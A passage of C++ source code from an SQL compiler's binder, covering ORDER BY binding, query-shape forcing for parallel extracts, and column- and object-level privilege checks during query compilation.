hostVar->isPrototypeValid() && (hostVar->isEnvVar() || hostVar->isDefine())) inputVars().removeAt(i); } } // STMT_DYNAMIC } // inputVarTree // add to the inputVars, any user functions that are to be treated // like input values, that is, evaluated once and used therafter. // Do not insert duplicate value ids. for (CollIndex i = 0; i < bindWA->inputFunction().entries(); i++ ) { if (NOT inputVars().contains(bindWA->inputFunction()[i])) inputVars().insert(bindWA->inputFunction()[i]); } // If aggregate functions have been found in the select list, then // create a groupby node with an empty groupby list, if the child is not // already a groupby node. // resolveAggregates(bindWA); if (bindWA->errStatus()) return NULL; // Add the unresolvedSequenceFunctions to the Sequence node for this // scope. If there are sequence functions, but no sequence node, it // is an error. Also if there is a sequence node, but no sequence // functions, it is an error. // If OLAP Window functions exist for this scope, they will have been // translated into sequence functions by this point and so will be added // to the Sequence node here. // resolveSequenceFunctions(bindWA); if (bindWA->errStatus()) return NULL; BindScope *prevScope = bindWA->getPreviousScope(currScope); NABoolean inRowSubquery = FALSE; if (prevScope) inRowSubquery = prevScope->context()->inRowSubquery(); if (inRowSubquery && (CmpCommon::getDefault(COMP_BOOL_137) == DF_OFF)) addOneRowAggregates(bindWA); returnedRoot = transformGroupByWithOrdinalPhase2(bindWA); if (! returnedRoot) return NULL; // ItemExpr *orderByTree = removeOrderByTree(); ItemExpr *orderByTree = removeOrderByTree(); if (orderByTree) { // // Tandem extension to ANSI (done only if source table is not grouped!): // Allow the ORDER BY clause to reference columns in the source table even // if the columns are not referenced in the select list. Treat the extra // columns as *system* columns so that they can be referenced by name // (ORDER BY name) but not by position in select list (ORDER BY n). // Thus, select-list columns have precedence, as they should since ANSI // allows only them in ORDER BY to begin with! // // Add all source columns to system column list of temporary orderBy; // remove select-list columns from this system column list; // insert select-list columns into the *user* column list // (these must be in separate loops to set up the orderBy XCNM correctly!). // Then bind the temporary (convert to ValueId list), reset the RETDesc. // bindWA->getCurrentScope()->context()->inOrderBy() = TRUE; CollIndex i; RETDesc orderBy; const RETDesc &select = *getRETDesc(); const RETDesc &source = *child(0)->getRETDesc(); // if the source is grouped, then the ORDER BY columns must be in // the select list. So, don't add any other columns that aren't // in the select list... if (source.isGrouped()) { orderBy.setGroupedFlag(); //10-031125-1549 -begin //Since we are processing a groupby we should //certainly have some node below it. Futher if //that node is a REL_ROOT we will certainly have //a child. So this rather unusual call sequence //is safe. We are actually looking for a Pattern //like REL_GROUPBY(REL_ROOT(*)) introduced to handle //Distint qualifier. //for example if we have a query like //select distinct j as jcol from t1 order by j; //the tree will look like //REL_ROOT(REL_GROUPBY(REL_ROOT(REL_SCAN(t1)))) //In this is a NON-ANSI query. To support queries like this //we need to expose "J" as a system column. To do that we need //to get hold of the RetDesc of the node below the REL_ROOT //(not the actual REL_ROOT). RETDesc *src = NULL; if(child(0)->child(0)&& child(0)->child(0)->getOperatorType() == REL_ROOT) { src = child(0)->child(0)->child(0)->getRETDesc(); } else { src = child(0)->getRETDesc(); } const ColumnDescList &sysColList = *src->getSystemColumnList(); const ColumnDescList &usrColList = *src->getColumnList(); ValueId vid; for(i = 0; i < select.getDegree(); i++) { vid = select.getValueId(i); for(CollIndex j = 0; j < sysColList.entries(); j++){ if( vid == sysColList[j]->getValueId()){ orderBy.addColumn(bindWA, sysColList[j]->getColRefNameObj() , sysColList[j]->getValueId() , SYSTEM_COLUMN); } } for(CollIndex k = 0; k < usrColList.entries(); k++){ if(vid == usrColList[k]->getValueId()){ orderBy.addColumn(bindWA, usrColList[k]->getColRefNameObj() , usrColList[k]->getValueId() , SYSTEM_COLUMN); } } } //10-031125-1549 -end NABoolean specialMode = ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_2) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON)); // In specialMode, we want to support order by on columns // which are not explicitely specified in the select list. // Ex: select a+1 from t group by a order by a; // Find all the column references in the orderByTree which are // also in the group by list but are not explicitely specified // in the select list. // This code path is for cases when both GROUP BY and ORDER BY are // specified. // If order by is specified without the group by, then that case // is already covered in the 'else' portion. if ((specialMode) && (child(0)->getOperatorType() == REL_GROUPBY) && (allOrderByRefsInGby_)) // already validated that all order by cols // are also in group by clause { ItemExprList orderByList(orderByTree, bindWA->wHeap()); GroupByAgg * grby=(GroupByAgg *)(child(0)->castToRelExpr()); for (CollIndex ii = 0; ii < orderByList.entries(); ii++) { ItemExpr * colRef = orderByList[ii]; if (colRef->getOperatorType() == ITM_INVERSE) colRef = colRef->child(0)->castToItemExpr(); if (colRef && colRef->getOperatorType() == ITM_REFERENCE) { ColReference * obyColRef = (ColReference*)colRef; for (CollIndex k = 0; k < usrColList.entries(); k++) { if (obyColRef->getColRefNameObj().getColName() == usrColList[k]->getColRefNameObj().getColName()) { orderBy.delColumn(bindWA, usrColList[k]->getColRefNameObj(), SYSTEM_COLUMN); orderBy.addColumn(bindWA, usrColList[k]->getColRefNameObj(), usrColList[k]->getValueId(), SYSTEM_COLUMN); break; } // if } // for } // if } // for } for (i = 0; i < select.getDegree(); i++) orderBy.delColumn(bindWA, select.getColRefNameObj(i), SYSTEM_COLUMN); } else { // add the potential ORDER BY columns... omitting the ones that will // in the select list anyway. orderBy.addColumns(bindWA, *source.getColumnList(), SYSTEM_COLUMN); orderBy.addColumns(bindWA, *source.getSystemColumnList(), SYSTEM_COLUMN); for (i = 0; i < select.getDegree(); i++) orderBy.delColumn(bindWA, select.getColRefNameObj(i), SYSTEM_COLUMN); } for (i = 0; i < select.getDegree(); i++) orderBy.addColumn(bindWA, select.getColRefNameObj(i), select.getValueId(i), USER_COLUMN); bindWA->getCurrentScope()->setRETDesc(&orderBy); // fix for defect 10-010522-2978 // If we need to move this OrderBy to the RelRoot above this one... // move it to the rowsetReqdOrder_ of that RelRoot, otherwise keep // it at this level... in the current RelRoot's reqdOrder_ ValueIdList & pRRO = getParentForRowsetReqdOrder() ? getParentForRowsetReqdOrder()->rowsetReqdOrder_ : reqdOrder(); // Replace any selIndexies in the orderByTree with what it refers to // before we expand it. // This is done so that we can deal with subqueries with degree > 1 // and MVFs. ItemExpr *sPtr = orderByTree, *ePtr = orderByTree; Int32 childIdx = 0; NABoolean onlyOneEntry(TRUE); CollIndex selListCount = compExpr().entries(); while (sPtr != NULL) { if (sPtr->getOperatorType() == ITM_ITEM_LIST) { ePtr = sPtr; sPtr = ePtr->child(0); childIdx = 0; onlyOneEntry = FALSE; } if (sPtr->getOperatorType() == ITM_SEL_INDEX) { SelIndex * si = (SelIndex*)(sPtr); CollIndex selIndex = si->getSelIndex(); if(selIndex == 0 || selIndex > selListCount) { *CmpCommon::diags() << DgSqlCode(-4007) << DgInt0((Lng32)si->getSelIndex()) << DgInt1(selListCount); bindWA->setErrStatus(); return NULL; } ValueId orderById = compExpr()[si->getSelIndex()-1]; if (ePtr->getOperatorType() == ITM_ITEM_LIST) ePtr->child(childIdx) = orderById.getItemExpr(); else ePtr = orderById.getItemExpr(); orderById.getItemExpr()->setInOrderByOrdinal(TRUE); } if ((ePtr->getArity() == 2) && ePtr->child(1) != NULL && ePtr->child(1)->getOperatorType() != ITM_ITEM_LIST && childIdx != 1) childIdx = 1; else childIdx = 0; sPtr = (childIdx == 1) ? ePtr->child(1) : NULL; } if (onlyOneEntry) orderByTree = ePtr; // If we had any ordinal expressions expand them in case there // are any UDFs or subquery of degree > 1. // Also expand any directly referenced UDFs and subqueries of degree > 1. ItemExprList origOrderByList(orderByTree, bindWA->wHeap()); origOrderByList.convertToItemExpr()-> convertToValueIdList(pRRO, bindWA, ITM_ITEM_LIST); // end fix for defect 10-010522-2978 if (bindWA->errStatus()) return NULL; bindWA->getCurrentScope()->setRETDesc(getRETDesc()); bindWA->getCurrentScope()->context()->inOrderBy() = FALSE; } // validate that select list doesn't contain any expressions that cannot be // grouped or ordered. for (Lng32 selIndex = 0; selIndex < compExpr().entries(); selIndex++) { ItemExpr * ie = compExpr()[selIndex].getItemExpr(); if ((ie->inGroupByOrdinal()) || (ie->inOrderByOrdinal())) { if (NOT ie->canBeUsedInGBorOB(TRUE)) { return NULL; } } } if (hasPartitionBy()) { ItemExpr *partByTree = removePartitionByTree(); partByTree->convertToValueIdSet(partArrangement_, bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return NULL; } // fix for defect 10-010522-2978 // If we're the upper level RelRoot, we must check to see if we have // any entries that need to be added to reqdOrder() and add them if // there are any... if ( rowsetReqdOrder_.entries() ) { // We never expect for reqdOrder to contain any entries. But // if it ever does, we want to be able to take a look at this // code again to decide whether we should be appending to the // reqdOrder list. Currently the code is written to append to // the end of the reqdOrder list, which is likely to be the correct // behavior even if there are entries in reqdOrder; we just think // that someone should have the chance to rethink this in the event // there are entries in reqdOrder and so we're making it fail here // to allow/force someone to make the decision. CMPASSERT(reqdOrder().entries() == 0); // note: NAList<ValueIdList>::insert(const NAList<ValueIdList> &) // actually does an append to the END of the list (not an // insert at the head or after the current position). reqdOrder().insert( rowsetReqdOrder_ ); } // end fix for defect 10-010522-2978 // Bind the update column specification of a cursor declaration. // Don't remove the tree: leave it for possible error 4118 in NormRelExpr. if (updateColTree_) { updateColTree_->convertToValueIdList(updateCol(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) { if (CmpCommon::diags()->contains(-4001)) *CmpCommon::diags() << DgSqlCode(-4117); return NULL; } if (getGroupAttr()->isEmbeddedDelete()) { // QSTUFF *CmpCommon::diags() << DgSqlCode(-4169); bindWA->setErrStatus() ; return NULL; } } // check whether a CONTROL QUERY SHAPE statement is in effect. // Do not do if this is a control query statement. if (ActiveControlDB()->getRequiredShape()) { OperatorTypeEnum op = child(0)->getOperatorType(); if (!child(0)->isAControlStatement() && op != REL_DESCRIBE && op != REL_EXPLAIN && op != REL_DDL && op != REL_LOCK && op != REL_UNLOCK && op != REL_SET_TIMEOUT && op != REL_STATISTICS && op != REL_TRANSACTION && op != REL_EXE_UTIL) reqdShape_ = ActiveControlDB()->getRequiredShape()->getShape(); } // If this is a parallel extract producer query: // * the number of requested streams must be greater than one and // not more than the number of configured CPUs // * force a shape with an ESP exchange node immediately below // the root ComUInt32 numExtractStreams = getNumExtractStreams(); if (numExtractStreams_ > 0) { // Check the number of requested streams NADefaults &defs = bindWA->getSchemaDB()->getDefaults(); NABoolean fakeEnv = FALSE; ComUInt32 numConfiguredESPs = defs.getTotalNumOfESPsInCluster(fakeEnv); if ((numExtractStreams == 1) || (numExtractStreams > numConfiguredESPs)) { *CmpCommon::diags() << DgSqlCode(-4119) << DgInt0((Lng32) numConfiguredESPs); bindWA->setErrStatus(); return NULL; } // Force the shape. There are three cases to consider: // a. there is no required shape in the ControlDB // b. there is a required shape and it is acceptable for this // parallel extract. // c. there is a required shape and it is not acceptable. if (reqdShape_ == NULL) { // Case a. // Manufacture an esp_exchange(cut,N) shape reqdShape_ = new (bindWA->wHeap()) ExchangeForceWildCard(new (bindWA->wHeap()) CutOp(0), ExchangeForceWildCard::FORCED_ESP_EXCHANGE, ExchangeForceWildCard::ANY_LOGPART, (Lng32) numExtractStreams_); } else { NABoolean reqdShapeIsOK = FALSE; if (reqdShape_->getOperatorType() == REL_FORCE_EXCHANGE) { ExchangeForceWildCard *exch = (ExchangeForceWildCard *) reqdShape_; ExchangeForceWildCard::forcedExchEnum whichType = exch->getWhich(); Lng32 howMany = exch->getHowMany(); if (whichType == ExchangeForceWildCard::FORCED_ESP_EXCHANGE && howMany == (Lng32) numExtractStreams_) { reqdShapeIsOK = TRUE; } } if (reqdShapeIsOK) { // Case b. // Do nothing } else { // Case c. // Add an esp_exchange to the top of the required shape RelExpr *child = reqdShape_; reqdShape_ = new (bindWA->wHeap()) ExchangeForceWildCard(child, ExchangeForceWildCard::FORCED_ESP_EXCHANGE, ExchangeForceWildCard::ANY_LOGPART, (Lng32) numExtractStreams_); } } // if (reqdShape_ == NULL) else ... } // if (numExtractStreams_ > 0) // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // If we have dynamic rowsets, we want to replace // dynamic parameters with available inputs. if (isTrueRoot() && bindWA->hasDynamicRowsetsInQuery()) { ValueIdSet inputs = getGroupAttr()->getCharacteristicInputs(); UInt32 j = 0; // this for loop is over the list of available inputs. We are replacing array // parameters with hostvars introduced during HostArraysWA::processArrayHostVar // The hostvars introduced in that method are contained in the inputs() list. for (ValueId id = inputs.init(); inputs.next(id); inputs.advance(id)) { if (id.getItemExpr()->getOperatorType() == ITM_DYN_PARAM) { continue; } // We are assuming here that the hostvars introduced are in the same order as // the parameter arrays in inputVars(), i.e. (hv_A, hv_B) corresponds to // (?,?,?(as A), ?(as B)) while (j < inputVars().entries()) { ItemExpr *ie = inputVars()[j].getItemExpr() ; OperatorTypeEnum ieType = ie->getOperatorType() ; if (( ieType != ITM_DYN_PARAM) || (((DynamicParam *) ie)->getRowsetSize() == 0)) { // if an ie is not a dynamicParam or it is a scalar dynamic Param do not remove // it from inputVars_. From embedded SQL it is possible to have scalar and array // dynamic params in the same statement. This is not possible from ODBC. j++; } else break ; } if (j < inputVars().entries()) { inputVars().removeAt(j); inputVars().insertAt(j, id); j++; } } } // RelRoot::codeGen() and Statement::execute() use TOPMOST root's accessOpts. // if (bindWA->getCurrentScope()->context()->stmtLevelAccessOptions()) if (!accessOptions().userSpecified()) // seems redundant accessOptions() = *bindWA->getCurrentScope()->context()->stmtLevelAccessOptions(); // Update operations currently require SERIALIZABLE (== MP REPEATABLE_) // locking level -- the QSTUFF-enabled DP2 now does this, supporting a true // READ_COMMITTED that is STABLE rather than merely CLEAN. if (!containsGenericUpdate(this)) { // Genesis 10-990114-6293: // This flag tells RelRoot::codeGen to set a flagbit in the root-tdb which // cli/Statement::execute + compareTransModes() will look at -- // if set, then this "read-write" stmt will be allowed to execute // in a run-time transmode of read-only W/O HAVING TO BE RECOMPILED. readOnlyTransIsOK() = TRUE; } if (isTrueRoot()) { if (updateCurrentOf()) { // add child genericupdate's primary key hostvars to pkeyList. // The getLeftmostScanNode() method will return the leftmost Scan node // as the original scan node may have moved due to the IM tree. pkeyList().insert(child(0)->castToRelExpr()->getLeftmostScanNode()->pkeyHvarList()); } for(Int32 st=0; st < (Int32)bindWA->getStoiList().entries(); st++) { if(bindWA->getStoiList()[st]->getStoi()->isView()) viewStoiList_.insert(bindWA->getStoiList()[st]); } if(bindWA->inDDL()) ddlStoiList_.insert(bindWA->getStoiList()); // populate the list of all the routines open information of this query stoiUdrList_.insert(bindWA->getUdrStoiList()); // populate the list of all the UDF information of this query udfList_.insert(bindWA->getUDFList()); // check privileges if (!checkPrivileges(bindWA)) { bindWA->setErrStatus(); return NULL; } // store the trigger's list in the root if (bindWA->getTriggersList()) { triggersList_ = new (bindWA->wHeap()) LIST(ComTimestamp) (bindWA->wHeap(), bindWA->getTriggersList()->entries()); triggersList_->insert(*(bindWA->getTriggersList())); // Don't allow OLT optimization when triggers are involved. oltOptInfo().setOltOpt(FALSE); } // store the uninitialized mv list if there are any // entries if( bindWA->getUninitializedMvList() ) { uninitializedMvList_ = new (bindWA->wHeap()) UninitializedMvNameList (bindWA->wHeap(), bindWA->getUninitializedMvList()->entries()); uninitializedMvList_->insert( *(bindWA->getUninitializedMvList()) ); } DBG( if (getenv("TVUSG_DEBUG")) bindWA->tableViewUsageList().display(); ) } // isTrueRoot // Don't allow OLT optimization when ON STATEMENT MV refresh is involved. if (bindWA->isBindingOnStatementMv()) oltOptInfo().setOltOpt(FALSE); // disable esp parallelism for merge statements. // See class RelRoot for details about this. if ((isTrueRoot()) && (bindWA->isMergeStatement())) { setDisableESPParallelism(TRUE); } // Remove the current scope. // if (!isDontOpenNewScope()) // -- Triggers bindWA->removeCurrentScope(); // In case we have a query of the form // SET <host var list> = <select statement> // we must update the value ids of the host variables in that list. // See Assignment Statement Internal Spec (a project of Compound Statements). if (assignmentStTree() && bindWA->getAssignmentStArea() && bindWA->getAssignmentStArea()->getAssignmentStHostVars() && !bindWA->getAssignmentStArea()->getAssignmentStHostVars()-> updateValueIds(compExpr(), assignmentStTree())) { bindWA->setErrStatus(); return NULL; } if (getPredExprTree()) { CMPASSERT(isTrueRoot()); ItemExpr * ie = removePredExprTree(); ie = ie->bindNode(bindWA); if (bindWA->errStatus()) return NULL; addPredExprTree(ie); } if (getFirstNRowsParam()) { firstNRowsParam_ = firstNRowsParam_->bindNode(bindWA); if (bindWA->errStatus()) return this; const SQLInt si(FALSE, FALSE); ValueId vid = firstNRowsParam_->castToItemExpr()->getValueId(); vid.coerceType(si, NA_NUMERIC_TYPE); if (vid.getType().getTypeQualifier() != NA_NUMERIC_TYPE) { // 4045 must be numeric. *CmpCommon::diags() << DgSqlCode(-4045) << DgString0(getTextUpper()); bindWA->setErrStatus(); return this; } } if ((NOT hasOrderBy()) && ((getFirstNRows() != -1) || (getFirstNRowsParam()))) { // create a firstN node to retrieve firstN rows. FirstN * firstn = new(bindWA->wHeap()) FirstN(child(0), getFirstNRows(), getFirstNRowsParam()); firstn->bindNode(bindWA); if (bindWA->errStatus()) return NULL; setChild(0, firstn); // reset firstN indication in the root node. setFirstNRows(-1); setFirstNRowsParam(NULL); } // if we have no user-specified access options then // get it from nearest enclosing scope that has one (if any) if (!accessOptions().userSpecified()) { StmtLevelAccessOptions *axOpts = bindWA->findUserSpecifiedAccessOption(); if (axOpts) { accessOptions() = *axOpts; } } if (bindWA->getHoldableType() == SQLCLIDEV_ANSI_HOLDABLE) { if (accessOptions().accessType() != ACCESS_TYPE_NOT_SPECIFIED_) { if (accessOptions().accessType() == REPEATABLE_) { *CmpCommon::diags() << DgSqlCode(-4381); bindWA->setErrStatus(); return NULL; } } else { TransMode::IsolationLevel il=CmpCommon::transMode()->getIsolationLevel(); if (CmpCommon::transMode()->ILtoAT(il) == REPEATABLE_ ) { *CmpCommon::diags() << DgSqlCode(-4381); bindWA->setErrStatus(); return NULL; } } } // The above code is in Scan::bindNode also. // It would be nice to refactor this common code; someday. return boundExpr; } // RelRoot::bindNode() // Present the select list as a tree of Item Expressions ItemExpr *RelRoot::selectList() { return compExpr().rebuildExprTree(ITM_ITEM_LIST); } // RelRoot::selectList() // Returns current place that assignmentStTree_ points to and // sets that pointer to NULL // LCOV_EXCL_START - cnu ItemExpr * RelRoot::removeAssignmentStTree() { ItemExpr* tempTree = assignmentStTree_; assignmentStTree_ = NULL; return tempTree; } // LCOV_EXCL_STOP bool OptSqlTableOpenInfo::checkColPriv(const PrivType privType, const PrivMgrUserPrivs *pPrivInfo) { CMPASSERT (pPrivInfo); NATable* table = getTable(); NAString columns = ""; if (!isColumnPrivType(privType)) { *CmpCommon::diags() << DgSqlCode(-4481) << DgString0(PrivMgrUserPrivs::convertPrivTypeToLiteral(privType).c_str()) << DgString1(table->getTableName().getQualifiedNameAsAnsiString()) << DgString2(columns); return false; } bool hasPriv = true; // initialize to something, gets set appropriately below LIST (Lng32) * colList = NULL ; switch (privType) { case INSERT_PRIV: { colList = (LIST (Lng32) *)&(getInsertColList()); break; } case UPDATE_PRIV: { colList = (LIST (Lng32) *)&(getUpdateColList()); break; } case SELECT_PRIV: { colList = (LIST (Lng32) *)&(getSelectColList()); break; } default: CMPASSERT(FALSE); // delete has no column privileges. } bool collectColumnNames = false; if (pPrivInfo->hasAnyColPriv(privType)) { collectColumnNames = true; columns += "(columns:" ; } bool firstColumn = true; for(size_t i = 0; i < colList->entries(); i++) { size_t columnNumber = (*colList)[i]; if (!(pPrivInfo->hasColPriv(privType,columnNumber))) { hasPriv = false; if (firstColumn && collectColumnNames) { columns += " "; firstColumn = false; } else if (collectColumnNames) columns += ", "; if (collectColumnNames) columns += table->getNAColumnArray()[columnNumber]->getColName(); } } if (collectColumnNames) columns += ")" ; // (colList->entries() == 0) ==> we have a select count(*) type query or a // select 1 from T type query. In other words the table needs to be accessed // but no column has been explicitly referenced. // For such queries if the user has privilege on any one column that is // sufficient. collectColumnNames indicates whether the user has privilege // on at least one column. The following if statement applies only to selects // For update and insert we do not expect colList to be empty. if ((colList->entries() == 0)&& !collectColumnNames) { hasPriv = false; columns = ""; } if (!hasPriv) *CmpCommon::diags() << DgSqlCode(-4481) << DgString0(PrivMgrUserPrivs::convertPrivTypeToLiteral(privType).c_str()) << DgString1(table->getTableName().getQualifiedNameAsAnsiString()) << DgString2(columns); return hasPriv; } NABoolean RelRoot::checkFirstNRowsNotAllowed(BindWA *bindWA) { // do not call this method on a true root. CMPASSERT(NOT isTrueRoot()); //***************************************************************** // FirstNRows >= 0 (for FirstN) // == -2 For Last 0 // == -3 For Last 1 // These values are set in parser; see the code SqlParser.y under // Non-Terminal querySpecification when fisrtN is specified //****************************************************************** if ( (getFirstNRows() >= 0 || getFirstNRows() == -2 || getFirstNRows() == -3) && // this root has firstn (!((getInliningInfo().isEnableFirstNRows()) || (getHostArraysArea() && getHostArraysArea()->getHasSelectIntoRowsets()) || //firstn is allowed with a rowset subroot (assignmentStTree())))) // first n is allowed in a CS. Presence of assignmentStTree // on a non true root implies presence of select into statement // within a cs { // 4102 The [FIRST/ANY n] syntax can only be used in an outermost SELECT statement. if (CmpCommon::getDefault(ALLOW_FIRSTN_IN_SUBQUERIES) == DF_OFF) return TRUE; } return FALSE; } // ---------------------------------------------------------------------------- // Method: checkPrivileges // // This method: // - Verifies that the user executing the query has the necessary privileges // - Adds security keys to RelRoot class that need to be checked when priv // changes (revokes) are performed. Security keys are part of the Query // Invalidation feature. // - Also, removes any previously cached entries if the user has no priv // // Input: pointer to the binder work area // Output: result of the check // TRUE - user has priv // FALSE - user does not have priv or unexpected error occurred // // The ComDiags area is populated with error details // The BindWA flag setFailedForPrivileges is set to TRUE if priv check fails // ---------------------------------------------------------------------------- NABoolean RelRoot::checkPrivileges(BindWA* bindWA) { // If internal caller and not part of explain, then return if (Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL)) return TRUE; // If qiPath (used for testing) is not 0, skip root user check NAString qiPath = ""; CmpCommon::getDefault(QI_PATH, qiPath, FALSE); if (qiPath.length() == 0 && ComUser::isRootUserID()) return TRUE; // See if there is anything to check // StoiList contains any tables used in the query // UdrStoiList contains any routines used in the query // CoProcAggrList contains any queries using the aggregate co-processor // SeqValList contains any sequences if (bindWA->getStoiList().entries() == 0 && bindWA->getUdrStoiList().entries() == 0 && bindWA->getCoProcAggrList().entries() == 0 && bindWA->getSeqValList().entries() == 0) return TRUE; // If authorization is not enabled, then return TRUE if (!CmpCommon::context()->isAuthorizationEnabled()) return TRUE; ComBoolean QI_enabled = (CmpCommon::getDefault(CAT_ENABLE_QUERY_INVALIDATION) == DF_ON); NABoolean RemoveNATableEntryFromCache = FALSE ; // Have the ComSecurityKey constructor compute the hash value for the the User's ID. // Note: The following code doesn't care about the object's hash value or the resulting // ComSecurityKey's ActionType....we just need the hash value for the User's ID. int64_t objectUID = 12345; Int32 thisUserID = ComUser::getCurrentUser(); ComSecurityKey userKey( thisUserID , objectUID , SELECT_PRIV , ComSecurityKey::OBJECT_IS_OBJECT ); uint32_t userHashValue = userKey.getSubjectHashValue(); // Set up a PrivMgrCommands class in case we need to get privilege information NAString privMDLoc; CONCAT_CATSCH(privMDLoc,CmpSeabaseDDL::getSystemCatalogStatic(),SEABASE_PRIVMGR_SCHEMA); PrivMgrCommands privInterface(privMDLoc.data(), CmpCommon::diags(), PrivMgr::PRIV_INITIALIZED); PrivStatus retcode = STATUS_GOOD; // ==> Check privileges for tables used in the query. SqlTableOpenInfo * stoi = NULL ; OptSqlTableOpenInfo * optStoi = NULL; for(Int32 i=0; i<(Int32)bindWA->getStoiList().entries(); i++) { RemoveNATableEntryFromCache = FALSE ; // Initialize each time through loop optStoi = (bindWA->getStoiList())[i]; stoi = optStoi->getStoi(); NATable* tab = optStoi->getTable(); // System metadata tables do not, by default, have privileges stored in the // NATable structure. Go ahead and retrieve them now. PrivMgrUserPrivs *pPrivInfo = tab->getPrivInfo(); PrivMgrUserPrivs privInfo; if (!pPrivInfo) { CmpSeabaseDDL cmpSBD(STMTHEAP); if (cmpSBD.switchCompiler(CmpContextInfo::CMPCONTEXT_TYPE_META)) { if (CmpCommon::diags()->getNumber(DgSqlCode::ERROR_) == 0) *CmpCommon::diags() << DgSqlCode( -4400 ); return FALSE; } retcode = privInterface.getPrivileges( tab->objectUid().get_value(), tab->getObjectType(), thisUserID, privInfo); cmpSBD.switchBackCompiler(); if (retcode != STATUS_GOOD) { tab->setRemoveFromCacheBNC(TRUE); bindWA->setFailedForPrivileges(TRUE); *CmpCommon::diags() << DgSqlCode( -1034 ); return FALSE; } pPrivInfo = &privInfo; } // Check each primary DML privilege to see if the query requires it. If // so, verify that the user has the privilege bool insertQIKeys = (QI_enabled && tab->getSecKeySet().entries() > 0); for (int_32 i = FIRST_DML_PRIV; i <= LAST_PRIMARY_DML_PRIV; i++) { if (stoi->getPrivAccess((PrivType)i)) { if (!pPrivInfo->hasPriv((PrivType)i) && !optStoi->checkColPriv((PrivType)i, pPrivInfo)) RemoveNATableEntryFromCache = TRUE; else if (insertQIKeys) findKeyAndInsertInOutputList(tab->getSecKeySet(),userHashValue,(PrivType)(i)); } } // wait until all the primary DML privileges have been checked before // setting failure information if ( RemoveNATableEntryFromCache ) { bindWA->setFailedForPrivileges( TRUE ); tab->setRemoveFromCacheBNC(TRUE); // To be removed by CmpMain before Compilation retry } } // for loop over tables in stoi list // ==> Check privileges for functions and procedures used in the query. NABoolean RemoveNARoutineEntryFromCache = FALSE ; if (bindWA->getUdrStoiList().entries()) { for(Int32 i=0; i<(Int32)bindWA->getUdrStoiList().entries(); i++) { // Privilege info for the user/routine combination is stored in the // NARoutine object. OptUdrOpenInfo *udrStoi = (bindWA->getUdrStoiList())[i]; NARoutine* rtn = udrStoi->getNARoutine(); PrivMgrUserPrivs *pPrivInfo = rtn->getPrivInfo(); NABoolean insertQIKeys = FALSE; if (QI_enabled && (rtn->getSecKeySet().entries() > 0)) insertQIKeys = TRUE; if (pPrivInfo == NULL) { RemoveNARoutineEntryFromCache = TRUE ; *CmpCommon::diags() << DgSqlCode( -1034 ); } // Verify that the user has execute priv else { if (pPrivInfo->hasPriv(EXECUTE_PRIV)) { // do this only if QI is enabled and object has security keys defined if ( insertQIKeys ) findKeyAndInsertInOutputList(rtn->getSecKeySet(), userHashValue, EXECUTE_PRIV); } // plan requires privilege but user has none, report an error else { RemoveNARoutineEntryFromCache = TRUE ; *CmpCommon::diags() << DgSqlCode( -4482 ) << DgString0( "EXECUTE" ) << DgString1( udrStoi->getUdrName() ); } } if ( RemoveNARoutineEntryFromCache ) { bindWA->setFailedForPrivileges(TRUE); // If routine exists in cache, add it to the list to remove NARoutineDB *pRoutineDBCache = bindWA->getSchemaDB()->getNARoutineDB(); NARoutineDBKey key(rtn->getSqlName(), bindWA->wHeap()); NARoutine *cachedNARoutine = pRoutineDBCache->get(bindWA, &key); if (cachedNARoutine != NULL) pRoutineDBCache->moveRoutineToDeleteList(cachedNARoutine, &key); } } // for loop over UDRs } // end if any UDRs. // ==> Check privs on any CoprocAggrs used in the query. for (Int32 i=0; i<(Int32)bindWA->getCoProcAggrList().entries(); i++) { RemoveNATableEntryFromCache = FALSE ; // Initialize each time through loop ExeUtilHbaseCoProcAggr *coProcAggr = (bindWA->getCoProcAggrList())[i]; NATable* tab = bindWA->getSchemaDB()->getNATableDB()-> get(coProcAggr->getCorrName(), bindWA, NULL); Int32 numSecKeys = 0; // Privilege info for the user/table combination is stored in the NATable // object. PrivMgrUserPrivs* pPrivInfo = tab->getPrivInfo(); PrivMgrUserPrivs privInfo; // System metadata tables do not, by default, have privileges stored in the // NATable structure. Go ahead and retrieve them now. if (!pPrivInfo) { CmpSeabaseDDL cmpSBD(STMTHEAP); if (cmpSBD.switchCompiler(CmpContextInfo::CMPCONTEXT_TYPE_META)) { if (CmpCommon::diags()->getNumber(DgSqlCode::ERROR_) == 0) *CmpCommon::diags() << DgSqlCode( -4400 ); return FALSE; } retcode = privInterface.getPrivileges( tab->objectUid().get_value(), tab->getObjectType(), thisUserID, privInfo); cmpSBD.switchBackCompiler(); if (retcode != STATUS_GOOD) { bindWA->setFailedForPrivileges( TRUE ); RemoveNATableEntryFromCache = TRUE; *CmpCommon::diags() << DgSqlCode( -1034 ); return FALSE; } pPrivInfo = &privInfo; } // Verify that the user has select priv // Select priv is needed for EXPLAIN requests, so no special check is done NABoolean insertQIKeys = FALSE; if (QI_enabled && (tab->getSecKeySet().entries()) > 0) insertQIKeys = TRUE; if (pPrivInfo->hasPriv(SELECT_PRIV)) { // do this only if QI is enabled and object has security keys defined if ( insertQIKeys ) findKeyAndInsertInOutputList(tab->getSecKeySet(), userHashValue, SELECT_PRIV ); } // plan requires privilege but user has none, report an error else { bindWA->setFailedForPrivileges( TRUE ); tab->setRemoveFromCacheBNC(TRUE); // To be removed by CmpMain before Compilation retry *CmpCommon::diags() << DgSqlCode( -4481 ) << DgString0( "SELECT" ) << DgString1( tab->getTableName().getQualifiedNameAsAnsiString() ); } } // for loop over coprocs // ==> Check privs on any sequence generators used in the query. for (Int32 i=0; i<(Int32)bindWA->getSeqValList().entries(); i++) { SequenceValue *seqVal = (bindWA->getSeqValList())[i]; NATable* tab = const_cast<NATable*>(seqVal->getNATable()); // No need to save priv info in NATable object representing a sequence; // these NATables are not cached. PrivMgrUserPrivs privInfo; CmpSeabaseDDL cmpSBD(STMTHEAP); if (cmpSBD.switchCompiler(CmpContextInfo::CMPCONTEXT_TYPE_META)) { if (CmpCommon::diags()->getNumber(DgSqlCode::ERROR_) == 0) *CmpCommon::diags() << DgSqlCode( -4400 ); return FALSE; } retcode = privInterface.getPrivileges(tab->objectUid().get_value(), COM_SEQUENCE_GENERATOR_OBJECT, 